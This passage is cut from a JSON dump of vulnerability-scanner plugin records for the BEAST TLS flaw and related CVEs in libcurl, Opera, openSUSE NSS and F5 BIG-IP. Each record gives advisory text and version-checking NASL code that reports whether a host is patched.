(deb_check(release:\"6.0\", prefix:\"libcurl3\", reference:\"7.21.0-2.1+squeeze2\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"libcurl3-dbg\", reference:\"7.21.0-2.1+squeeze2\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"libcurl3-gnutls\", reference:\"7.21.0-2.1+squeeze2\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"libcurl4-gnutls-dev\", reference:\"7.21.0-2.1+squeeze2\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"libcurl4-openssl-dev\", reference:\"7.21.0-2.1+squeeze2\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:22:49", "description": "The version of Opera installed on the remote Windows host is prior to 11.51. It is, therefore, affected by multiple vulnerabilities :\n\n - An unspecified error can allow an insecure or malicious site to cause the browser to display security information belonging to another, secure site in the address bar. This causes the insecure or malicious site to appear to be part of, or secured by, a third-party site. (CVE-2011-3388)\n\n - An information disclosure vulnerability, known as BEAST, exists in the SSL 3.0 and TLS 1.0 protocols due to a flaw in the way the initialization vector (IV) is selected when operating in cipher-block chaining (CBC) modes. A man-in-the-middle attacker can exploit this to obtain plaintext HTTP header data, by using a blockwise chosen-boundary attack (BCBA) on an HTTPS session, in conjunction with JavaScript code that uses the HTML5 WebSocket API, the Java URLConnection API, or the Silverlight WebClient API. (CVE-2011-3389)", "cvss3": {}, "published": "2011-09-01T00:00:00", "type": "nessus", "title": "Opera < 11.51 Multiple Vulnerabilities (BEAST)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-3388", "CVE-2011-3389"], "modified": "2022-12-05T00:00:00", "cpe": ["cpe:/a:opera:opera_browser"], "id": "OPERA_1151.NASL", "href": "https://www.tenable.com/plugins/nessus/56042", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(56042);\n script_version(\"1.21\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\"CVE-2011-3388\", \"CVE-2011-3389\");\n script_bugtraq_id(49388, 49978);\n script_xref(name:\"CERT\", value:\"864643\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2019-0547\");\n\n script_name(english:\"Opera < 11.51 Multiple Vulnerabilities (BEAST)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host contains a web browser that is affected by multiple\nvulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Opera installed on the remote Windows host is prior to\n11.51. It is, therefore, affected by multiple vulnerabilities :\n\n - An unspecified error can allow an insecure or malicious\n site to cause the browser to display security\n information belonging to another, secure site in the\n address bar. This causes the insecure or malicious site\n to appear to be part of, or secured by, a third-party\n site. (CVE-2011-3388)\n\n - An information disclosure vulnerability, known as BEAST,\n exists in the SSL 3.0 and TLS 1.0 protocols due to a\n flaw in the way the initialization vector (IV) is\n selected when operating in cipher-block chaining (CBC)\n modes. A man-in-the-middle attacker can exploit this\n to obtain plaintext HTTP header data, by using a\n blockwise chosen-boundary attack (BCBA) on an HTTPS\n session, in conjunction with JavaScript code that uses\n the HTML5 WebSocket API, the Java URLConnection API,\n or the Silverlight WebClient API. (CVE-2011-3389)\");\n script_set_attribute(attribute:\"see_also\", value:\"http://web.archive.org/web/20130223093835/http://www.opera.com/support/kb/view/1000/\");\n script_set_attribute(attribute:\"see_also\", value:\"http://web.archive.org/web/20170915045026/http://www.opera.com:80/docs/changelogs/windows/1151/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.imperialviolet.org/2011/09/23/chromeandbeast.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.openssl.org/~bodo/tls-cbc.txt\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Opera 11.51 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2011/08/31\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/08/31\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/09/01\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:opera:opera_browser\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2011-2022 Tenable Network Security, Inc.\");\n\n script_dependencies(\"opera_installed.nasl\");\n script_require_keys(\"SMB/Opera/Version\");\n\n exit(0);\n}\n\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nversion = get_kb_item_or_exit(\"SMB/Opera/Version\");\nversion_ui = get_kb_item(\"SMB/Opera/Version_UI\");\n\nif (isnull(version_ui)) version_report = version;\nelse version_report = version_ui; \n\nfixed_version = \"11.51.1087.0\";\n\n# Check if we need to display full version info in case of Alpha/Beta/RC\nmajor_minor = eregmatch(string:version, pattern:\"^([0-9]+\\.[0-9]+)\");\nif (major_minor[1] == \"11.51\")\n{\n fixed_version_report = fixed_version;\n version_report = version;\n}\nelse\n fixed_version_report = \"11.51\";\n\nif (ver_compare(ver:version, fix:fixed_version) == -1)\n{\n if (report_verbosity > 0)\n {\n install_path = get_kb_item(\"SMB/Opera/Path\");\n\n report = \n '\\n Path : ' + install_path +\n '\\n Installed version : ' + version_report +\n '\\n Fixed version : ' + fixed_version_report +\n '\\n';\n security_warning(port:get_kb_item(\"SMB/transport\"), extra:report);\n }\n else security_warning(port:get_kb_item(\"SMB/transport\"));\n exit(0);\n}\nelse exit(0, \"The host is not affected since Opera \"+version_report+\" is installed.\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:21:15", "description": "The Mozilla NSS libraries were updated to version 3.13.1 to fix various bugs and security problems.\n\nFollowing security issues were fixed: dbg114-nss-201112-5564 new_updateinfo nss-201112-5564 SSL 2.0 is disabled by default dbg114-nss-201112-5564 new_updateinfo nss-201112-5564 A defense against the SSL 3.0 and TLS 1.0 CBC chosen plaintext attack demonstrated by Rizzo and Duong (CVE-2011-3389) is enabled by default.\nSet the SSL_CBC_RANDOM_IV SSL option to PR_FALSE to disable it. bnc# dbg114-nss-201112-5564 new_updateinfo nss-201112-5564 SHA-224 is supported dbg114-nss-201112-5564 new_updateinfo nss-201112-5564 NSS_NoDB_Init does not try to open /pkcs11.txt and /secmod.db anymore (bmo#641052, bnc#726096) (CVE-2011-3640)\n\nAlso following bugs were fixed: dbg114-nss-201112-5564 new_updateinfo nss-201112-5564 fix spec file syntax for qemu-workaround dbg114-nss-201112-5564 new_updateinfo nss-201112-5564 Added a patch to fix errors in the pkcs11n.h header file. (bmo#702090) dbg114-nss-201112-5564 new_updateinfo nss-201112-5564 better SHA-224 support (bmo#647706) dbg114-nss-201112-5564 new_updateinfo nss-201112-5564 SHA-224 is supported dbg114-nss-201112-5564 new_updateinfo nss-201112-5564 Added PORT_ErrorToString and PORT_ErrorToName to return the error message and symbolic name of an NSS error code dbg114-nss-201112-5564 new_updateinfo nss-201112-5564 Added NSS_GetVersion to return the NSS version string dbg114-nss-201112-5564 new_updateinfo nss-201112-5564 Added experimental support of RSA-PSS to the softoken only", "cvss3": {}, "published": "2014-06-13T00:00:00", "type": "nessus", "title": "openSUSE Security Update : nss-201112 (openSUSE-SU-2012:0030-1) (BEAST)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-3389", "CVE-2011-3640"], "modified": "2022-12-05T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:libfreebl3", "p-cpe:/a:novell:opensuse:libfreebl3-32bit", "p-cpe:/a:novell:opensuse:libfreebl3-debuginfo", "p-cpe:/a:novell:opensuse:libfreebl3-debuginfo-32bit", "p-cpe:/a:novell:opensuse:libsoftokn3", "p-cpe:/a:novell:opensuse:libsoftokn3-32bit", "p-cpe:/a:novell:opensuse:libsoftokn3-debuginfo", "p-cpe:/a:novell:opensuse:libsoftokn3-debuginfo-32bit", "p-cpe:/a:novell:opensuse:mozilla-nss", "p-cpe:/a:novell:opensuse:mozilla-nss-32bit", "p-cpe:/a:novell:opensuse:mozilla-nss-certs", "p-cpe:/a:novell:opensuse:mozilla-nss-certs-32bit", "p-cpe:/a:novell:opensuse:mozilla-nss-certs-debuginfo", "p-cpe:/a:novell:opensuse:mozilla-nss-certs-debuginfo-32bit", "p-cpe:/a:novell:opensuse:mozilla-nss-debuginfo", "p-cpe:/a:novell:opensuse:mozilla-nss-debuginfo-32bit", "p-cpe:/a:novell:opensuse:mozilla-nss-debugsource", "p-cpe:/a:novell:opensuse:mozilla-nss-devel", "p-cpe:/a:novell:opensuse:mozilla-nss-sysinit", "p-cpe:/a:novell:opensuse:mozilla-nss-sysinit-32bit", "p-cpe:/a:novell:opensuse:mozilla-nss-sysinit-debuginfo", "p-cpe:/a:novell:opensuse:mozilla-nss-sysinit-debuginfo-32bit", "p-cpe:/a:novell:opensuse:mozilla-nss-tools", "p-cpe:/a:novell:opensuse:mozilla-nss-tools-debuginfo", "cpe:/o:novell:opensuse:11.4"], "id": "SUSE_11_4_NSS-201112-111220.NASL", "href": "https://www.tenable.com/plugins/nessus/75980", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update nss-201112-5564.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(75980);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\"CVE-2011-3389\", \"CVE-2011-3640\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2019-0547\");\n\n script_name(english:\"openSUSE Security Update : nss-201112 (openSUSE-SU-2012:0030-1) (BEAST)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote openSUSE host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"The Mozilla NSS libraries were updated to version 3.13.1 to fix\nvarious bugs and security problems.\n\nFollowing security issues were fixed: dbg114-nss-201112-5564\nnew_updateinfo nss-201112-5564 SSL 2.0 is disabled by default\ndbg114-nss-201112-5564 new_updateinfo nss-201112-5564 A defense\nagainst the SSL 3.0 and TLS 1.0 CBC chosen plaintext attack\ndemonstrated by Rizzo and Duong (CVE-2011-3389) is enabled by default.\nSet the SSL_CBC_RANDOM_IV SSL option to PR_FALSE to disable it. bnc#\ndbg114-nss-201112-5564 new_updateinfo nss-201112-5564 SHA-224 is\nsupported dbg114-nss-201112-5564 new_updateinfo nss-201112-5564\nNSS_NoDB_Init does not try to open /pkcs11.txt and /secmod.db anymore\n(bmo#641052, bnc#726096) (CVE-2011-3640)\n\nAlso following bugs were fixed: dbg114-nss-201112-5564 new_updateinfo\nnss-201112-5564 fix spec file syntax for qemu-workaround\ndbg114-nss-201112-5564 new_updateinfo nss-201112-5564 Added a patch to\nfix errors in the pkcs11n.h header file. (bmo#702090)\ndbg114-nss-201112-5564 new_updateinfo nss-201112-5564 better SHA-224\nsupport (bmo#647706) dbg114-nss-201112-5564 new_updateinfo\nnss-201112-5564 SHA-224 is supported dbg114-nss-201112-5564\nnew_updateinfo nss-201112-5564 Added PORT_ErrorToString and\nPORT_ErrorToName to return the error message and symbolic name of an\nNSS error code dbg114-nss-201112-5564 new_updateinfo nss-201112-5564\nAdded NSS_GetVersion to return the NSS version string\ndbg114-nss-201112-5564 new_updateinfo nss-201112-5564 Added\nexperimental support of RSA-PSS to the softoken only\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.novell.com/show_bug.cgi?id=726096\");\n script_set_attribute(attribute:\"see_also\", value:\"https://lists.opensuse.org/opensuse-updates/2012-01/msg00009.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://lists.opensuse.org/opensuse-updates/2012-01/msg00021.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected nss-201112 packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/12/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/06/13\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libfreebl3\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libfreebl3-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libfreebl3-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libfreebl3-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsoftokn3\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsoftokn3-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsoftokn3-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsoftokn3-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mozilla-nss\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mozilla-nss-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mozilla-nss-certs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mozilla-nss-certs-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mozilla-nss-certs-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mozilla-nss-certs-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mozilla-nss-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mozilla-nss-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mozilla-nss-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mozilla-nss-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mozilla-nss-sysinit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mozilla-nss-sysinit-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mozilla-nss-sysinit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mozilla-nss-sysinit-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mozilla-nss-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mozilla-nss-tools-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:11.4\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"SuSE Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE11\\.4)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"11.4\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE11.4\", reference:\"libfreebl3-3.13.1-0.2.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"libfreebl3-debuginfo-3.13.1-0.2.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"libsoftokn3-3.13.1-0.2.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"libsoftokn3-debuginfo-3.13.1-0.2.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"mozilla-nss-3.13.1-0.2.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"mozilla-nss-certs-3.13.1-0.2.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"mozilla-nss-certs-debuginfo-3.13.1-0.2.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"mozilla-nss-debuginfo-3.13.1-0.2.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"mozilla-nss-debugsource-3.13.1-0.2.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"mozilla-nss-devel-3.13.1-0.2.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"mozilla-nss-sysinit-3.13.1-0.2.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"mozilla-nss-sysinit-debuginfo-3.13.1-0.2.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"mozilla-nss-tools-3.13.1-0.2.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"mozilla-nss-tools-debuginfo-3.13.1-0.2.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", cpu:\"x86_64\", reference:\"libfreebl3-32bit-3.13.1-0.2.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", cpu:\"x86_64\", reference:\"libfreebl3-debuginfo-32bit-3.13.1-0.2.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", cpu:\"x86_64\", reference:\"libsoftokn3-32bit-3.13.1-0.2.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", cpu:\"x86_64\", reference:\"libsoftokn3-debuginfo-32bit-3.13.1-0.2.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", cpu:\"x86_64\", reference:\"mozilla-nss-32bit-3.13.1-0.2.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", cpu:\"x86_64\", reference:\"mozilla-nss-certs-32bit-3.13.1-0.2.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", cpu:\"x86_64\", reference:\"mozilla-nss-certs-debuginfo-32bit-3.13.1-0.2.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", cpu:\"x86_64\", reference:\"mozilla-nss-debuginfo-32bit-3.13.1-0.2.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", cpu:\"x86_64\", reference:\"mozilla-nss-sysinit-32bit-3.13.1-0.2.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", cpu:\"x86_64\", reference:\"mozilla-nss-sysinit-debuginfo-32bit-3.13.1-0.2.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"mozilla-nss\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-19T14:27:03", "description": "The Opera browser received a security and bugfix update to 11.51.\n\nMore information can be found here:\nhttp://www.opera.com/docs/changelogs/unix/1151/\n\nCVE-2011-3388 - incorrect security information display CVE-2011-3389 - unspecified 'low severity issue, as reported by Thai Duong and Juliano Rizzo.'", "cvss3": {}, "published": "2014-06-13T00:00:00", "type": "nessus", "title": "openSUSE Security Update : opera (openSUSE-SU-2011:1025-1) (BEAST)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-3388", "CVE-2011-3389"], "modified": "2022-12-05T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:opera", "p-cpe:/a:novell:opensuse:opera-gtk", "p-cpe:/a:novell:opensuse:opera-kde4", "cpe:/o:novell:opensuse:11.3"], "id": "SUSE_11_3_OPERA-110906.NASL", "href": "https://www.tenable.com/plugins/nessus/75697", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update opera-5115.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(75697);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\"CVE-2011-3388\", \"CVE-2011-3389\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2019-0547\");\n\n script_name(english:\"openSUSE Security Update : opera (openSUSE-SU-2011:1025-1) (BEAST)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote openSUSE host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"The Opera browser received a security and bugfix update to 11.51.\n\nMore information can be found here:\nhttp://www.opera.com/docs/changelogs/unix/1151/\n\nCVE-2011-3388 - incorrect security information display CVE-2011-3389 -\nunspecified 'low severity issue, as reported by Thai Duong and Juliano\nRizzo.'\");\n script_set_attribute(attribute:\"see_also\", value:\"https://help.opera.com/en/latest/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.novell.com/show_bug.cgi?id=716002\");\n script_set_attribute(attribute:\"see_also\", value:\"https://lists.opensuse.org/opensuse-updates/2011-09/msg00016.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected opera packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/09/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/06/13\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:opera\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:opera-gtk\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:opera-kde4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:11.3\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"SuSE Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE11\\.3)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"11.3\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE11.3\", reference:\"opera-11.51-0.2.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.3\", reference:\"opera-gtk-11.51-0.2.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.3\", reference:\"opera-kde4-11.51-0.2.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"opera\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-07-19T19:31:23", "description": "The version of F5 Networks BIG-IP installed on the remote host is prior to tested version. It is, therefore, affected by multiple vulnerabilities as referenced in the K13400 advisory.\n\n - The SSL protocol, as used in certain configurations in Microsoft Windows and Microsoft Internet Explorer, Mozilla Firefox, Google Chrome, Opera, and other products, encrypts data by using CBC mode with chained initialization vectors, which allows man-in-the-middle attackers to obtain plaintext HTTP headers via a blockwise chosen-boundary attack (BCBA) on an HTTPS session, in conjunction with JavaScript code that uses (1) the HTML5 WebSocket API, (2) the Java URLConnection API, or (3) the Silverlight WebClient API, aka a BEAST attack. (CVE-2011-3389)\n\n - The CBC mode in the TLS protocol, as used in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, Windows 7 Gold and SP1, and other products, allows remote web servers to obtain plaintext data by triggering multiple requests to a third-party HTTPS server and sniffing the network during the resulting HTTPS session, aka TLS Protocol Vulnerability.\n (CVE-2012-1870)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2023-07-17T00:00:00", "type": "nessus", "title": "F5 Networks BIG-IP : SSL 3.0/TLS 1.0 vulnerability (K13400)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-3389", "CVE-2012-1870"], "modified": "2023-07-18T00:00:00", "cpe": ["cpe:/a:f5:big-ip_application_security_manager", "cpe:/a:f5:big-ip_access_policy_manager", "cpe:/a:f5:big-ip_advanced_firewall_manager", "cpe:/a:f5:big-ip_global_traffic_manager", "cpe:/a:f5:big-ip_local_traffic_manager", "cpe:/a:f5:big-ip_policy_enforcement_manager", "cpe:/a:f5:big-ip_wan_optimization_manager", "cpe:/a:f5:big-ip_domain_name_system", "cpe:/h:f5:big-ip_protocol_security_manager", "cpe:/h:f5:big-ip"], "id": "F5_BIGIP_SOL13400.NASL", "href": "https://www.tenable.com/plugins/nessus/178337", "sourceData": "#%NASL_MIN_LEVEL 80900\n##\n# (C) Tenable, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from F5 Networks BIG-IP Solution K13400.\n#\n# @NOAGENT@\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(178337);\n script_version(\"1.2\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/07/18\");\n\n script_cve_id(\"CVE-2011-3389\", \"CVE-2012-1870\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2019-0547\");\n\n script_name(english:\"F5 Networks BIG-IP : SSL 3.0/TLS 1.0 vulnerability (K13400)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote device is missing a vendor-supplied security patch.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of F5 Networks BIG-IP installed on the remote host is prior to tested version. It is, therefore, affected by\nmultiple vulnerabilities as referenced in the K13400 advisory.\n\n - The SSL protocol, as used in certain configurations in Microsoft Windows and Microsoft Internet Explorer,\n Mozilla Firefox, Google Chrome, Opera, and other products, encrypts data by using CBC mode with chained\n initialization vectors, which allows man-in-the-middle attackers to obtain plaintext HTTP headers via a\n blockwise chosen-boundary attack (BCBA) on an HTTPS session, in conjunction with JavaScript code that uses\n (1) the HTML5 WebSocket API, (2) the Java URLConnection API, or (3) the Silverlight WebClient API, aka a\n BEAST attack. (CVE-2011-3389)\n\n - The CBC mode in the TLS protocol, as used in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2,\n Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, Windows 7 Gold and SP1, and other products,\n allows remote web servers to obtain plaintext data by triggering multiple requests to a third-party HTTPS\n server and sniffing the network during the resulting HTTPS session, aka TLS Protocol 